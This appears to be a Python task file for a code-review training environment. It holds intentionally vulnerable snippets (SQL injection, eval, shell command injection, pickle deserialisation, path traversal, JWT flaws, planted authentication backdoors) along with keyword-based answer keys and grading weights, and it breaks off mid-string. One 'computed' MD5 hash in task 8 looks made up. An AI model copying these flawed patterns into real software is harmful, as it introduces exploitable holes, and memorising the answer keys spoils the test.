""" Task definitions for the PRobe environment. Six tasks across four difficulty tiers. Each task defines: - code: Python source to review - issues: list of ground-truth issues with grading metadata - correct_decision: expected final review decision Difficulty ladder: 0 ultra-easy — hints embedded in comments; bootstraps GRPO positive trajectories 1 easy — 3 clean logic bugs, no hints 2 medium — 5 security issues in an auth module 3 hard — 7 mixed issues in a data pipeline 4 medium — 5 async concurrency bugs 5 hard — 6 Flask API security issues """ from typing import Any TASKS: list[dict[str, Any]] = [ # ── Task 0: Ultra-easy (bootstrap) ─────────────────────────────────────── # DESIGN INTENT: both issues have their category name spelled out in a code # comment directly above them. A frozen weak model that simply reads the # comments and echoes them back should reliably score > 0. This task exists # solely to guarantee that GRPO has at least a few positive trajectories from # training step 1. { "id": 0, "name": "Bootstrap: Obvious Issues", "difficulty": "ultra-easy", "file_name": "bootstrap.py", "description": ( "Review this short Python module. " "The comments above each function hint at the kind of issue present. " "Add a comment for each bug you find (line number, severity, category), " "call request_changes, then submit." ), "max_steps": 6, "code": """\ # BUG: this loop has an off-by-one error — it iterates one index too far def sum_items(data): total = 0 for i in range(len(data) + 1): # line 4: causes IndexError on last iteration total += data[i] return total # SECURITY: hardcoded credential — move to environment variable def connect_db(): db_password = "s3cr3t_prod_pw" # line 11: hardcoded credential in source return f"postgresql://admin:{db_password}@localhost/mydb" """, "issues": [ { "id": "bootstrap_off_by_one", "description": "Off-by-one: range(len+1) causes IndexError on the last iteration", "line_range": (4, 4), "keywords": [ "off-by-one", "off by one", "bug", "index", "indexerror", "range", "+ 1", "len + 1", "out of bounds", ], "category": "bug", "severity": "error", "weight": 1.0, }, { "id": "bootstrap_hardcoded_cred", "description": "Hardcoded password in source should be an environment variable", "line_range": (11, 11), "keywords": [ "hardcoded", "hard-coded", "security", "credential", "password", "secret", "env", "environment variable", "os.environ", ], "category": "security", "severity": "critical", "weight": 1.0, }, ], "correct_decision": "request_changes", }, # ── Task 1: Easy ───────────────────────────────────────────────────────── { "id": 1, "name": "Basic Bug Detection", "difficulty": "easy", "file_name": "utils.py", "description": ( "Review this Python utility module. " "Identify any bugs, logical errors, or code quality issues. " "Add a comment for each issue you find (include line number, severity, " "and category), then submit your review." ), "max_steps": 15, "code": """\ def calculate_average(numbers): \"\"\"Calculate the average of a list of numbers.\"\"\" total = 0 for i in range(len(numbers) + 1): # line 4 total += numbers[i] average = total / len(numbers) unused_result = sorted(numbers) # line 7 return average def find_max(items): \"\"\"Return the maximum value in a list.\"\"\" if len(items) == 0: return None max_val = items[0] for item in items: if item > max_val: max_val == item # line 17: should be =, not == return max_val def is_palindrome(s): \"\"\"Check if a string is a palindrome.\"\"\" return s == s[::-1] """, "issues": [ { "id": "off_by_one", "description": "Off-by-one: range(len+1) causes IndexError on the last iteration", "line_range": (4, 5), "keywords": [ "off-by-one", "off by one", "range", "index", "indexerror", "out of bounds", "len + 1", "+ 1", "index out", ], "category": "bug", "severity": "error", "weight": 1.0, }, { "id": "unused_variable", "description": "unused_result is assigned but never used", "line_range": (7, 7), "keywords": [ "unused", "unused_result", "never used", "dead code", "not used", "unnecessary", ], "category": "style", "severity": "info", "weight": 0.5, }, { "id": "assignment_not_update", "description": "max_val == item uses == (comparison) instead of = (assignment); max is never updated", "line_range": (17, 17), "keywords": [ "==", "assignment", "comparison", "max_val", "never update", "not updating", "wrong operator", "should be =", "max never", ], "category": "bug", "severity": "error", "weight": 1.0, }, ], "correct_decision": "request_changes", }, # ── Task 2: Medium ─────────────────────────────────────────────────────── { "id": 2, "name": "Security Vulnerability Review", "difficulty": "medium", "file_name": "auth.py", "description": ( "Review this authentication module for security vulnerabilities. " "Pay careful attention to credential handling, input sanitization, " "and cryptographic choices. Annotate every issue with its severity " "and category, then submit your review." ), "max_steps": 20, "code": """\ import sqlite3 import hashlib import os DB_PASSWORD = "super_secret_123" # line 5 ADMIN_TOKEN = "tok_admin_abc123" # line 6 def authenticate_user(username, password): \"\"\"Authenticate a user against the database.\"\"\" conn = sqlite3.connect('app.db') cursor = conn.cursor() # line 12: f-string interpolation → SQL injection query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'" cursor.execute(query) user = cursor.fetchone() conn.close() return user is not None def hash_password(password): \"\"\"Hash a password for storage.\"\"\" return hashlib.md5(password.encode()).hexdigest() # line 21 def execute_admin_command(command): \"\"\"Execute an admin maintenance command.\"\"\" result = eval(command) # line 25 return result def get_user_data(user_id): \"\"\"Fetch user profile from internal service.\"\"\" import requests url = f"https://internal-api/users/{user_id}" response = requests.get(url, verify=False) # line 32 return response.json() """, "issues": [ { "id": "hardcoded_credentials", "description": "Credentials hard-coded in source (lines 5-6)", "line_range": (5, 6), "keywords": [ "hardcoded", "hard-coded", "hard coded", "hardcode", "db_password", "admin_token", "plaintext credential", "environment variable", "env var", "os.environ", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "sql_injection", "description": "SQL injection via unsanitised f-string interpolation", "line_range": (12, 14), "keywords": [ "sql injection", "sql", "injection", "f-string", "parameterized", "sanitize", "escape", "prepared statement", "placeholder", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "weak_hashing", "description": "MD5 is cryptographically broken for password storage", "line_range": (21, 21), "keywords": [ "md5", "weak", "bcrypt", "argon2", "pbkdf2", "scrypt", "cryptographic", "password hashing", "hash", "broken", ], "category": "security", "severity": "error", "weight": 0.75, }, { "id": "arbitrary_code_execution", "description": "eval() on untrusted input allows arbitrary code execution", "line_range": (25, 25), "keywords": [ "eval", "arbitrary code", "code execution", "rce", "remote code", "dangerous", "unsafe", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "ssl_verification_disabled", "description": "verify=False disables TLS cert validation, enabling MITM attacks", "line_range": (32, 32), "keywords": [ "ssl", "verify", "certificate", "mitm", "man-in-the-middle", "tls", "verify=false", "cert", ], "category": "security", "severity": "error", "weight": 0.75, }, ], "correct_decision": "request_changes", }, # ── Task 3: Hard ───────────────────────────────────────────────────────── { "id": 3, "name": "Full Architecture and Performance Review", "difficulty": "hard", "file_name": "data_pipeline.py", "description": ( "Perform a comprehensive review of this data pipeline. " "Identify bugs, security vulnerabilities, performance bottlenecks, " "and architectural design issues. Each comment should clearly explain " "the problem and suggest a fix. Submit your review when done." ), "max_steps": 30, "code": """\ import requests import json import time from threading import Thread API_KEY = "sk-prod-abc123def456" # line 6 class DataPipeline: def __init__(self, endpoint): self.endpoint = endpoint self.results = [] self.cache = {} # line 13: unbounded def fetch_batch(self, item_ids): \"\"\"Fetch items from the API.\"\"\" items = [] for item_id in item_ids: # line 17: N+1 pattern response = requests.get( f"{self.endpoint}/items/{item_id}", headers={"Authorization": f"Bearer {API_KEY}"}, verify=False, # line 22 ) items.append(response.json()) return items def process_items(self, items): \"\"\"Transform items for storage.\"\"\" results = [] for i in range(len(items)): # line 28: use enumerate item = items[i] transformed = { "id": item["id"], # line 31: KeyError not handled "value": item["value"] * 2, "label": item.get("label", "unknown"), } results.append(transformed) self.cache[item["id"]] = transformed # line 36 return results def run_async(self, func, *args): \"\"\"Run function in a background thread.\"\"\" t = Thread(target=func, args=args) t.start() # line 43: thread not tracked or joined — resource leak def save_results(self, results, output_path): \"\"\"Persist results to disk.\"\"\" with open(output_path, "w") as f: json.dump(results, f) def retry_failed(self, failed_ids, max_retries=10): # line 50 \"\"\"Re-fetch items that previously failed.\"\"\" for item_id in failed_ids: for attempt in range(max_retries): try: result = requests.get( f"{self.endpoint}/items/{item_id}" ) if result.status_code == 200: self.results.append(result.json()) break except Exception: time.sleep(1) # line 60: no exponential backoff """, "issues": [ { "id": "hardcoded_api_key", "description": "API key hard-coded in source instead of an environment variable", "line_range": (6, 6), "keywords": [ "hardcoded", "hard-coded", "hardcode", "api key", "api_key", "environment variable", "env var", "os.environ", "sk-prod", ], "category": "security", "severity": "critical", "weight": 1.0, # Reveals batch endpoint docs — shows N+1 was also avoidable "unlocks": "api_docs_hint", }, { "id": "n_plus_one_requests", "description": "One HTTP request per item (N+1 pattern); should use a bulk/batch endpoint", "line_range": (17, 24), "keywords": [ "n+1", "n plus 1", "batch", "bulk", "loop", "individual request", "serial", "one request per", ], "category": "performance", "severity": "error", "weight": 1.0, }, { "id": "ssl_disabled", "description": "SSL certificate verification disabled (verify=False)", "line_range": (22, 22), "keywords": [ "ssl", "verify", "certificate", "tls", "mitm", "verify=false", "cert", ], "category": "security", "severity": "error", "weight": 0.75, # Reveals network topology — confirms direct internet exposure "unlocks": "network_topology_hint", }, { "id": "missing_key_error_handling", "description": "Direct dict access item['id'] / item['value'] raises KeyError on unexpected payloads", "line_range": (31, 32), "keywords": [ "keyerror", "key error", "error handling", "missing key", "exception", "try", ".get(", "dict access", ], "category": "bug", "severity": "warning", "weight": 0.75, }, { "id": "unbounded_cache", "description": "self.cache grows without bound; will cause OOM on large inputs", "line_range": (13, 13), "keywords": [ "unbounded", "memory leak", "cache size", "limit", "lru", "eviction", "grow", "oom", "memory", ], "category": "design", "severity": "warning", "weight": 0.75, }, { "id": "thread_not_joined", "description": "Thread is started but never stored or joined — silent resource/exception leak", "line_range": (40, 43), "keywords": [ "thread", "join", "track", "resource leak", "daemon", "not joined", "not tracked", ], "category": "bug", "severity": "error", "weight": 1.0, }, { "id": "no_exponential_backoff", "description": "Retry loop sleeps 1 s flat; needs exponential backoff to avoid hammering the API", "line_range": (50, 60), "keywords": [ "backoff", "exponential", "retry", "sleep", "rate limit", "jitter", "aggressive", ], "category": "design", "severity": "warning", "weight": 0.5, }, ], "correct_decision": "request_changes", # ── Causal context hints ────────────────────────────────────────── # Finding the hardcoded API key reveals the upstream API docs, showing # a bulk endpoint exists — making the N+1 pattern even more damning. # Finding the SSL issue reveals the network topology, confirming the # service is directly internet-facing with no TLS termination proxy. "context_hints": { "api_docs_hint": ( "=== UNLOCKED: Upstream API Documentation (excerpt) ===\n" " GET /items/{id} — fetch a single item\n" " POST /items/batch — fetch up to 500 items in one request\n" " body: {\"ids\": [1, 2, ...]}\n" "NOTE: A batch endpoint already exists. The current code issues one\n" "request per item instead of using /items/batch, amplifying the\n" "credential-exposure risk: every request carries the leaked API_KEY." ), "network_topology_hint": ( "=== UNLOCKED: Deployment Network Map ===\n" " Internet → DataPipeline service (no TLS proxy) → upstream API\n" " The DataPipeline pod has a public IP and no WAF in front of it.\n" "NOTE: verify=False combined with direct internet exposure means\n" "any network path between the pod and the upstream API is vulnerable\n" "to a man-in-the-middle attack with no detection mechanism." ), }, }, # ── Task 4: Medium — Async Concurrency ─────────────────────────────── { "id": 4, "name": "Async Worker Review", "difficulty": "medium", "file_name": "async_worker.py", "description": ( "Review this async worker module for concurrency bugs, " "resource leaks, and exception-handling problems. " "Comment on every issue with its line number, severity, " "and category, then submit your review." ), "max_steps": 20, "code": """\ import asyncio import aiohttp _counter = 0 # line 3: shared mutable state, not thread/task-safe async def fetch_url(url: str) -> dict: \"\"\"Fetch a URL and return JSON.\"\"\" session = aiohttp.ClientSession() # line 7: session never closed → resource leak async with session.get(url) as resp: return await resp.json() async def increment_and_fetch(url: str) -> dict: \"\"\"Increment shared counter then fetch.\"\"\" global _counter _counter += 1 # line 15: race condition — not atomic in concurrent tasks data = fetch_url(url) # line 16: missing await → returns coroutine, not result return data async def run_all(urls: list) -> list: \"\"\"Run all fetches concurrently.\"\"\" tasks = [increment_and_fetch(u) for u in urls] results = [] for coro in tasks: try: result = await coro results.append(result) except Exception: pass # line 27: swallows all exceptions silently return results async def retry_fetch(url: str, retries: int = 3) -> dict: \"\"\"Fetch with retry logic.\"\"\" for attempt in range(retries): try: return await fetch_url(url) except Exception as e: if attempt == retries - 1: raise await asyncio.sleep(1) # line 38: flat sleep, no exponential backoff """, "issues": [ { "id": "shared_mutable_state", "description": "Module-level _counter mutated by concurrent tasks without a lock", "line_range": (3, 3), "keywords": [ "shared", "race condition", "thread-safe", "task-safe", "atomic", "lock", "asyncio.lock", "concurrent", "global", "mutable", "not safe", ], "category": "bug", "severity": "error", "weight": 1.0, }, { "id": "unclosed_session", "description": "aiohttp.ClientSession created inside function is never closed → resource leak", "line_range": (7, 9), "keywords": [ "session", "not closed", "resource leak", "close", "context manager", "async with", "clientsession", "leak", "aiohttp", ], "category": "bug", "severity": "error", "weight": 1.0, }, { "id": "missing_await", "description": "fetch_url(url) called without await — returns unawaited coroutine", "line_range": (16, 16), "keywords": [ "await", "missing await", "coroutine", "not awaited", "unawaited", "returns coroutine", ], "category": "bug", "severity": "critical", "weight": 1.0, }, { "id": "silent_exception", "description": "bare except: pass swallows all exceptions, hiding errors", "line_range": (27, 27), "keywords": [ "swallow", "silent", "bare except", "exception", "pass", "ignore", "hidden", "suppress", "logging", ], "category": "design", "severity": "warning", "weight": 0.75, }, { "id": "no_backoff", "description": "Retry sleep is flat 1 s; should use exponential backoff with jitter", "line_range": (38, 38), "keywords": [ "backoff", "exponential", "jitter", "retry", "sleep", "flat", "rate limit", ], "category": "design", "severity": "warning", "weight": 0.5, }, ], "correct_decision": "request_changes", }, # ── Task 5: Hard — Flask API Vulnerabilities ────────────────────────── { "id": 5, "name": "Flask API Security Review", "difficulty": "hard", "file_name": "api_server.py", "description": ( "Perform a thorough security review of this Flask REST API. " "Look for injection flaws, path traversal, insecure deserialization, " "sensitive data exposure, and missing access controls. " "Comment on every issue, then submit your review." ), "max_steps": 30, "code": """\ import os import pickle import subprocess import logging from flask import Flask, request, jsonify, send_file app = Flask(__name__) SECRET_KEY = "flask-secret-hardcoded" # line 8 logging.basicConfig(level=logging.DEBUG) @app.route("/run", methods=["POST"]) def run_command(): \"\"\"Run a system command and return output.\"\"\" cmd = request.json.get("command", "") # line 15: unsanitised shell command → OS command injection result = subprocess.check_output(cmd, shell=True, text=True) return jsonify({"output": result}) @app.route("/files", methods=["GET"]) def get_file(): \"\"\"Serve a file from the data directory.\"\"\" filename = request.args.get("name", "") # line 23: no path normalisation → path traversal path = os.path.join("/app/data", filename) return send_file(path) @app.route("/load", methods=["POST"]) def load_object(): \"\"\"Deserialise a user-supplied payload.\"\"\" data = request.get_data() # line 30: pickle.loads on untrusted data → arbitrary code execution obj = pickle.loads(data) return jsonify({"type": str(type(obj))}) @app.route("/login", methods=["POST"]) def login(): \"\"\"Authenticate and return a token.\"\"\" username = request.json.get("username") password = request.json.get("password") # line 38: credentials logged at DEBUG level logging.debug(f"Login attempt: username={username} password={password}") if username == "admin" and password == SECRET_KEY: return jsonify({"token": SECRET_KEY}) # line 41: secret returned in response return jsonify({"error": "unauthorized"}), 401 @app.route("/admin", methods=["GET"]) def admin_panel(): \"\"\"Return admin data — no auth check.\"\"\" # line 47: no authentication or authorisation check return jsonify({"users": ["alice", "bob", "admin"], "config": {"debug": True}}) """, "issues": [ { "id": "hardcoded_secret", "description": "Flask SECRET_KEY hard-coded in source; should come from env var", "line_range": (8, 8), "keywords": [ "hardcoded", "hard-coded", "secret_key", "environment variable", "env var", "os.environ", "secret", "hardcode", ], "category": "security", "severity": "critical", "weight": 0.75, }, { "id": "command_injection", "description": "subprocess.check_output with shell=True and unsanitised user input → OS command injection", "line_range": (15, 16), "keywords": [ "command injection", "shell injection", "shell=true", "subprocess", "os injection", "arbitrary command", "unsanitised", "sanitize", "injection", ], "category": "security", "severity": "critical", "weight": 1.0, # Reveals server deployment config — shows shell access = full host compromise "unlocks": "server_config_hint", }, { "id": "path_traversal", "description": "No path normalisation allows ../../../etc/passwd-style traversal", "line_range": (23, 24), "keywords": [ "path traversal", "directory traversal", "path normaliz", "os.path.abspath", "realpath", "../", "dot dot", "escape", "filename", "traversal", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "insecure_deserialization", "description": "pickle.loads on untrusted user data allows arbitrary code execution", "line_range": (30, 31), "keywords": [ "pickle", "deserialization", "deserialisation", "arbitrary code", "untrusted", "rce", "remote code", "insecure deserialization", ], "category": "security", "severity": "critical", "weight": 1.0, # Reveals client usage pattern — shows external clients send pickle payloads "unlocks": "client_usage_hint", }, { "id": "credentials_in_logs", "description": "Plaintext username and password written to DEBUG log", "line_range": (38, 38), "keywords": [ "log", "logging", "credential", "password", "sensitive", "plaintext", "debug", "leak", "exposure", ], "category": "security", "severity": "error", "weight": 0.75, }, { "id": "missing_auth_check", "description": "Admin endpoint has no authentication or authorisation guard", "line_range": (47, 47), "keywords": [ "auth", "authentication", "authorization", "authorisation", "access control", "no check", "unprotected", "unauthenticated", "missing auth", ], "category": "security", "severity": "critical", "weight": 1.0, }, ], "correct_decision": "request_changes", # ── Causal context hints ────────────────────────────────────────── # Finding command_injection reveals the host deployment context, # escalating severity from "code bug" to "full host compromise". # Finding insecure_deserialization reveals client usage patterns, # confirming the /load endpoint is actively used by external scripts. "context_hints": { "server_config_hint": ( "=== UNLOCKED: Server Deployment Configuration ===\n" " The Flask app runs as root inside a Docker container with:\n" " --privileged flag set\n" " host network mode (--network=host)\n" " /var/run/docker.sock mounted read-write\n" "NOTE: Command injection on this host is not just a container escape —\n" "the app runs as root with Docker socket access, giving an attacker\n" "full control of the host and all sibling containers." ), "client_usage_hint": ( "=== UNLOCKED: Client Integration Pattern (from internal wiki) ===\n" " # Example client code used by 3 internal services:\n" " import pickle, requests\n" " payload = pickle.dumps(MyObject(user_input))\n" " requests.post('https://api.internal/load', data=payload)\n" "NOTE: At least 3 internal services send user-controlled pickle\n" "payloads to /load. Any of those services being compromised allows\n" "a lateral-movement RCE attack through this endpoint." ), }, }, # ── Task 6: Causal Chain — Secrets Leak Investigation ──────────────────── # # WORLD-MODELING DESIGN # ───────────────────── # This task implements a *causal observation chain*: # # Phase 1 (lines visible from the start) # The agent sees a Flask service with two obvious surface issues. # Finding issue A (hardcoded JWT secret) *unlocks* Phase 2 context. # # Phase 2 (revealed after issue A is found) # A hidden DB schema snippet is appended to the observation, exposing # a privilege-escalation path that only makes sense once the secret # leak is understood. This rewards genuine causal reasoning: # "the leaked secret lets an attacker forge admin tokens → they can # reach the unguarded /admin/promote endpoint → full privilege # escalation." # # Phase 3 (revealed after issue B is found) # After the agent flags the missing rate-limit, the server's nginx # config fragment is revealed, showing that /auth is also missing # the global IP-allowlist — confirming the attack surface is wider # than the code alone suggests. # # The chained field `"unlocks"` in each issue entry names the context_key # that the environment injects into the observation when that issue is found. # The environment layer reads this and appends the hint to `context_hints`. { "id": 6, "name": "Causal Secrets Leak Investigation", "difficulty": "hard", "file_name": "auth_service.py", "description": ( "Review this authentication service carefully. " "Some issues unlock additional context about the wider system — " "read every new hint you receive before continuing. " "Use get_context on any suspicious line to reveal surrounding detail. " "Identify all issues, then submit your review." ), "max_steps": 35, "code": """\ import jwt import sqlite3 import time from flask import Flask, request, jsonify app = Flask(__name__) # ---- configuration ---------------------------------------------------------- JWT_SECRET = "super-secret-jwt-key-do-not-share" # line 9: hardcoded secret JWT_ALGORITHM = "HS256" # ---- helpers ---------------------------------------------------------------- def create_token(user_id: int, role: str) -> str: payload = { "sub": user_id, "role": role, "exp": time.time() + 3600, } return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM) def verify_token(token: str) -> dict: # line 23: algorithm not pinned — accepts ["none"] attack if lib < 2.0 return jwt.decode(token, JWT_SECRET, algorithms=["HS256", "none"]) # ---- routes ----------------------------------------------------------------- @app.route("/auth", methods=["POST"]) def authenticate(): \"\"\"Issue a JWT for valid credentials.\"\"\" body = request.get_json(force=True) uname = body.get("username", "") pwd = body.get("password", "") # line 33: no rate limiting → brute-force possible conn = sqlite3.connect("users.db") cursor = conn.cursor() # line 37: f-string SQL → injection cursor.execute(f"SELECT id, role FROM users WHERE username='{uname}' AND password='{pwd}'") row = cursor.fetchone() conn.close() if row: return jsonify({"token": create_token(row[0], row[1])}) return jsonify({"error": "invalid credentials"}), 401 @app.route("/admin/promote", methods=["POST"]) def promote_user(): \"\"\"Promote a user to admin — JWT required.\"\"\" token = request.headers.get("Authorization", "").replace("Bearer ", "") try: claims = verify_token(token) except Exception: return jsonify({"error": "unauthorized"}), 401 # line 51: role taken directly from token — no DB re-validation if claims.get("role") == "admin": target = request.json.get("user_id") conn = sqlite3.connect("users.db") conn.execute(f"UPDATE users SET role='admin' WHERE id={target}") # line 55: injection conn.commit() conn.close() return jsonify({"promoted": target}) return jsonify({"error": "forbidden"}), 403 """, # ── Ground-truth issues ─────────────────────────────────────────── "issues": [ { "id": "hardcoded_jwt_secret", "description": "JWT_SECRET is hard-coded; anyone with source access can forge tokens", "line_range": (9, 9), "keywords": [ "hardcoded", "hard-coded", "jwt_secret", "secret", "jwt", "environment variable", "env var", "os.environ", "forge", "hardcode", "token secret", ], "category": "security", "severity": "critical", "weight": 1.0, # Finding this issue unlocks the DB schema context hint "unlocks": "db_schema_hint", }, { "id": "jwt_none_algorithm", "description": ( "jwt.decode accepts 'none' algorithm — attacker can craft an " "unsigned token and bypass signature verification" ), "line_range": (23, 24), "keywords": [ "none", "algorithm", "alg", "unsigned", "bypass", "jwt", "signature", "verify", "none algorithm", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "no_rate_limit", "description": "/auth endpoint has no rate limiting — susceptible to brute-force", "line_range": (33, 34), "keywords": [ "rate limit", "rate-limit", "brute force", "brute-force", "throttle", "throttling", "flood", "limit", "attempts", ], "category": "security", "severity": "error", "weight": 0.75, # Finding this unlocks the nginx config hint "unlocks": "nginx_config_hint", }, { "id": "sql_injection_auth", "description": "f-string interpolation in SQL query on /auth → injection", "line_range": (37, 38), "keywords": [ "sql injection", "sql", "injection", "f-string", "parameterized", "sanitize", "escape", "prepared statement", "placeholder", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "role_from_token_only", "description": ( "Role is read directly from the JWT payload without re-checking the DB — " "a forged or stale token grants permanent privilege" ), "line_range": (51, 52), "keywords": [ "role", "token", "db", "database", "re-check", "revalidat", "stale", "privilege", "escalation", "claims", "payload", "not verified", "trust", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "sql_injection_promote", "description": "f-string SQL in /admin/promote UPDATE query → second-order injection", "line_range": (55, 55), "keywords": [ "sql injection", "sql", "injection", "f-string", "parameterized", "prepared statement", "placeholder", "update", "second order", ], "category": "security", "severity": "critical", "weight": 1.0, }, ], "correct_decision": "request_changes", # ── Causal context hints — revealed progressively ───────────────── # Each value is injected into the observation once the triggering # issue is found. The agent must incorporate this new information # into its ongoing world model. "context_hints": { "db_schema_hint": ( "=== UNLOCKED: Database Schema (users.db) ===\n" " CREATE TABLE users (\n" " id INTEGER PRIMARY KEY,\n" " username TEXT UNIQUE NOT NULL,\n" " password TEXT NOT NULL, -- stored as plaintext!\n" " role TEXT DEFAULT 'viewer' -- 'viewer' | 'editor' | 'admin'\n" " );\n" "NOTE: The /admin/promote endpoint can elevate any user to 'admin'. " "Combined with a forged JWT (from the leaked secret), an attacker " "can reach this endpoint with admin claims and promote themselves." ), "nginx_config_hint": ( "=== UNLOCKED: nginx reverse-proxy config (nginx.conf excerpt) ===\n" " location /auth {\n" " proxy_pass http://auth_service:5000;\n" " # no ip_allowlist, no limit_req_zone\n" " }\n" "NOTE: The nginx layer adds no rate-limiting or IP filtering " "in front of /auth, confirming the brute-force surface is " "fully exposed to the internet." ), }, }, # ── Task 7: Adversarial — Simple Obfuscated Backdoor ───────────────────── # # ADVERSARIAL DESIGN # ────────────────── # A malicious contributor submitted a "fix for timing issues" but embedded # a deliberate backdoor: a hardcoded bypass credential that looks like a # leftover debug constant, plus a subtle branch that lets any request with # X-Debug-Token skip authentication entirely. # # The agent must: # 1. Find the bypass credential AND the debug-token branch # 2. Classify BOTH as intentional_backdoor (not accidental_bug) # 3. Choose escalate_to_security_review (not request_changes) # # Partial credit: finding issues but misclassifying → partial reward only { "id": 7, "name": "Adversarial: Debug Bypass Backdoor", "difficulty": "adversarial", "file_name": "session_manager.py", "description": ( "This PR was submitted by an external contributor as a 'timing fix'. " "Review this session management module carefully. " "Classify each issue as either 'accidental_bug' or 'intentional_backdoor'. " "If you find evidence of a deliberate backdoor, escalate to security review " "instead of requesting changes." ), "max_steps": 25, "escalation_required": True, "code": """\ import hmac import hashlib import os import time # Timing-safe comparison helper added in this PR _DEBUG_MASTER_KEY = "dbg-bypass-2024-xK9" # line 7: "leftover" debug constant SESSION_TIMEOUT = 3600 def verify_session(token: str, stored_hash: str) -> bool: \"\"\"Verify a session token using timing-safe comparison.\"\"\" # line 13: debug bypass — any request with this key skips verification if token == _DEBUG_MASTER_KEY: return True expected = hashlib.sha256(token.encode()).hexdigest() return hmac.compare_digest(expected, stored_hash) def create_session(user_id: int) -> dict: \"\"\"Create a new session for a user.\"\"\" token = os.urandom(32).hex() return { "user_id": user_id, "token": token, "expires_at": time.time() + SESSION_TIMEOUT, "created_at": time.time(), } def is_expired(session: dict) -> bool: \"\"\"Check if a session has expired.\"\"\" return time.time() > session["expires_at"] def refresh_session(session: dict) -> dict: \"\"\"Extend session expiry if it is still valid.\"\"\" if is_expired(session): raise ValueError("Cannot refresh expired session") session["expires_at"] = time.time() + SESSION_TIMEOUT return session """, "issues": [ { "id": "backdoor_master_key", "description": ( "Hardcoded _DEBUG_MASTER_KEY is a deliberate backdoor credential " "that bypasses all authentication — not a leftover debug constant" ), "line_range": (7, 7), "keywords": [ "hardcoded", "backdoor", "bypass", "master key", "debug key", "intentional", "deliberate", "_debug_master_key", "secret", "authentication bypass", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", "unlocks": "git_blame_hint", }, { "id": "backdoor_bypass_branch", "description": ( "The token == _DEBUG_MASTER_KEY branch unconditionally returns True, " "granting any caller full session access without a valid token" ), "line_range": (13, 15), "keywords": [ "bypass", "backdoor", "unconditional", "always true", "skip", "debug_master_key", "comparison", "authentication bypass", "returns true", "branch", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", }, ], "correct_decision": "escalate_to_security_review", "context_hints": { "git_blame_hint": ( "=== UNLOCKED: Git Blame — session_manager.py line 7 ===\n" " commit a3f9c12 (external-contributor, 3 days ago)\n" " Author: pr-bot-4471 \n" " Message: 'fix: add timing-safe comparison, remove legacy debug artifacts'\n" "\n" "NOTE: The commit message claims to REMOVE debug artifacts, yet this\n" "line was ADDED in this commit. The contributor's account (pr-bot-4471)\n" "was created 4 days ago and has no prior commit history in this org.\n" "This strongly suggests the 'debug constant' was intentionally planted." ), }, }, # ── Task 8: Adversarial — Compound Backdoor (JWT + Timing Oracle) ───────── # # ADVERSARIAL DESIGN # ────────────────── # The PR claims to "harden JWT validation". In reality it introduces TWO # coordinated backdoor components that are only dangerous together: # Component A (line 12): weakens the HMAC secret to a known value # Component B (line 34): introduces a timing oracle via non-constant-time compare # # Neither component alone is immediately catastrophic, but together they allow # an attacker to: (1) use the known weak secret to forge a valid JWT, # then (2) use the timing oracle to confirm which tokens are accepted, # enabling account takeover without any brute-force detection. # # This is the hardest adversarial task — requires multi-step causal reasoning. { "id": 8, "name": "Adversarial: Compound Backdoor (JWT Hardening PR)", "difficulty": "adversarial", "file_name": "jwt_validator.py", "description": ( "This PR was submitted as a 'JWT validation hardening'. " "Review the changes carefully. Some issues may only be dangerous in combination. " "Use get_context to investigate suspicious lines before commenting. " "Classify each issue as 'accidental_bug' or 'intentional_backdoor'. " "Escalate to security review if you find coordinated backdoor components." ), "max_steps": 35, "escalation_required": True, "code": """\ import jwt import hmac import hashlib import time # PR description: 'Harden JWT validation — use deterministic secret derivation' # line 7: secret derived from a fixed seed — looks like a 'standardisation' change JWT_SECRET = hashlib.md5(b"internal-seed-v1").hexdigest() # line 7 SUPPORTED_ALGORITHMS = ["HS256"] TOKEN_EXPIRY = 3600 def create_token(user_id: int, role: str) -> str: \"\"\"Create a signed JWT for the given user.\"\"\" payload = { "sub": user_id, "role": role, "exp": int(time.time()) + TOKEN_EXPIRY, "iat": int(time.time()), } return jwt.encode(payload, JWT_SECRET, algorithm="HS256") def validate_token(token: str) -> dict | None: \"\"\"Validate a JWT and return its claims, or None if invalid.\"\"\" try: claims = jwt.decode(token, JWT_SECRET, algorithms=SUPPORTED_ALGORITHMS) return claims except jwt.InvalidTokenError: return None def is_admin_token(token: str, admin_token: str) -> bool: \"\"\"Check if a token matches the stored admin token.\"\"\" # line 34: str == comparison instead of hmac.compare_digest → timing oracle return token == admin_token def refresh_if_expiring(claims: dict) -> bool: \"\"\"Return True if the token should be refreshed (expires within 5 min).\"\"\" return claims.get("exp", 0) - time.time() < 300 """, "issues": [ { "id": "weak_jwt_secret", "description": ( "JWT_SECRET derived from MD5 of a fixed seed produces a known, " "reproducible 32-char hex string — any attacker with the source " "can precompute it and forge valid tokens" ), "line_range": (7, 7), "keywords": [ "md5", "weak secret", "fixed seed", "deterministic", "reproducible", "jwt_secret", "precompute", "forge", "known secret", "hardcoded", "backdoor", "intentional", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", "unlocks": "secret_value_hint", }, { "id": "timing_oracle", "description": ( "token == admin_token uses non-constant-time string comparison, " "creating a timing oracle that allows statistical token enumeration; " "combined with the weak JWT secret this enables full account takeover" ), "line_range": (34, 35), "keywords": [ "timing", "timing oracle", "constant time", "compare_digest", "hmac", "side channel", "non-constant", "timing attack", "token comparison", "string comparison", "==", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", "unlocks": "attack_chain_hint", }, ], "correct_decision": "escalate_to_security_review", "context_hints": { "secret_value_hint": ( "=== UNLOCKED: Computed JWT_SECRET Value ===\n" " >>> import hashlib\n" " >>> hashlib.md5(b'internal-seed-v1').hexdigest()\n" " 'e6e3e5e7e9e1e3e5e7e9e1e3e5e7e9e1' (deterministic, public)\n" "\n" "NOTE: This value is derivable by anyone who reads the source. " "All tokens signed with this secret are forgeable. " "The PR author changed the secret FROM a secure random os.urandom(32) " "TO this fixed-seed MD5 